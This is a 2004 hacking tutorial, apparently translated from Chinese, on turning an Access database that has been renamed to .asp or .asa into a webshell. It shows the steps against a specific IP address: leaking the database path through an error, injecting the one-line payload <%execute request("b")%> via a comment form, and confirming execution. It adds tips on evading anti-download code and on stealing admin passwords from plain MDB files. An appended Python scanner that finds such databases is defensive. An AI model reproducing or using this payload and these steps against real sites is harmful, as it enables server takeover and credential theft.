Author: SuperHei · Lilo
Article type: Original
Release date: 2004-09-16

Perhaps because network security technology has developed and administrators have become more capable, sites running an Access + ASP system now often rename the MDB file to ASP or ASA so that the database cannot be downloaded. Leaving aside that a file with a changed suffix can still be fetched directly with download tools, doing this actually opens a door for intruders: a database with an ASP/ASA suffix can be used directly to obtain a WebShell.

One.

Everyone knows that <% %> is the marker of an ASP file: in an ASP file, only the code between <% and %> is executed. All data of an Access + ASP web system is stored in the database file (the MDB file). Since the administrator has renamed the MDB file to an ASP file, if the data we submit contains <% %>, the code between <% and %> is executed when we request this ASP database. So we only need to submit malicious code into the database, and the ASP-suffixed database becomes our webshell.

Two. The example

Pick any target. First we make the site reveal its database path, to see whether the database has an ASP suffix: http://220.170.151.103/test/dlog\showlog.asp?Cat_id=5&log_id=210 Returns:
Microsoft VBScript compilation error '800A03F6'
Expected 'End'
/iishelp/common/500-100.asp, line 242
Microsoft JET Database Engine error '80004005'
'd:/log_mdb/)dlog_mdb).asp' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
/TEST/CONN.ASP, line 18

We request: http://220.170.151.103/test/dlog/log_mdb/%29dlog_mdb%29.asp It returns a mass of garbled characters, so the database could be downloaded directly with a download manager (not discussed here). Back on the home page there is a "netizen comment" function. We register a user and post a comment:
<%execute request("b")%>

This writes the ASP code <%execute request("b")%> into the database, so the database is now our WebShell. We request: http://220.170.151.103/test/dlog/log_mdb/%29dlog_mdb%29.asp At the end of the output we see:

/iishelp/common/500-100.asp, line 242
Microsoft VBScript runtime error '800A000D'
Type mismatch: 'Execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp, line 1266

Haha, our inserted code has run. Note: the code we submit to the database must not be too large, so we use
<%execute request("b")%>

Three. Some other questions and ideas

1. Some databases renamed to an ASP suffix also have invalid ASP code such as <%='a'-1%> added to them, to block downloading of the database completely. Because that invalid ASP code is present, once our webshell code has been inserted, running the file only displays the error raised by the earlier invalid code and does not execute our shell code. Although this prevents some attacks, a hidden danger remains: if error-tolerant code is placed ahead of the failing code, the inserted webshell code still executes and displays correctly.

2. For databases whose suffix has not been changed, that is, plain MDB files, we can download the file directly to obtain the back-end (admin) password, log in to the back end, and use the database backup function to save the database with an ASP suffix.
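
A defensive check for the situation described above, added here as an example (not code from the original article): it walks a web root and reports files with an .asp or .asa suffix that are really Access/Jet databases, listing any <% %> blocks found in their raw bytes. The function names, the sample files and the 200-byte block limit are assumptions made for the illustration.

```python
import os
import re
import tempfile

# Jet 3/4 .mdb files carry this signature at byte offset 4.
JET_MAGIC = b"Standard Jet DB"
SCRIPT_EXTS = {".asp", ".asa"}
# Heuristic: a short <% ... %> block in the raw bytes (200-byte cap is an assumption).
ASP_BLOCK = re.compile(rb"<%.{1,200}?%>", re.DOTALL)


def is_jet_database(data):
    """True if the bytes begin with an Access/Jet file header."""
    return data[4:4 + len(JET_MAGIC)] == JET_MAGIC


def scan_webroot(root):
    """Report databases stored under a script suffix inside root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if not is_jet_database(data):
                continue  # an ordinary ASP page, not a renamed database
            blocks = [m.group(0) for m in ASP_BLOCK.finditer(data)]
            findings.append({"path": os.path.relpath(path, root),
                             "asp_blocks": blocks})
    return findings


def demo():
    """Scan a constructed web root (sample files, not real data)."""
    header = b"\x00\x01\x00\x00" + JET_MAGIC + b"\x00" * 64
    samples = {
        "data.asp": header + b'\x07comment<% Response.Write "x" %>\x00',
        "clean.asa": header + b"\x07no script here\x00",
        "index.asp": b"<html><% Response.Write 1 %></html>",
        "site.mdb": header,
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_webroot(root)
```

A finding with an empty asp_blocks list is still worth reviewing: it is a database that the server will hand to the ASP engine, so any <% %> text stored in it later would be interpreted.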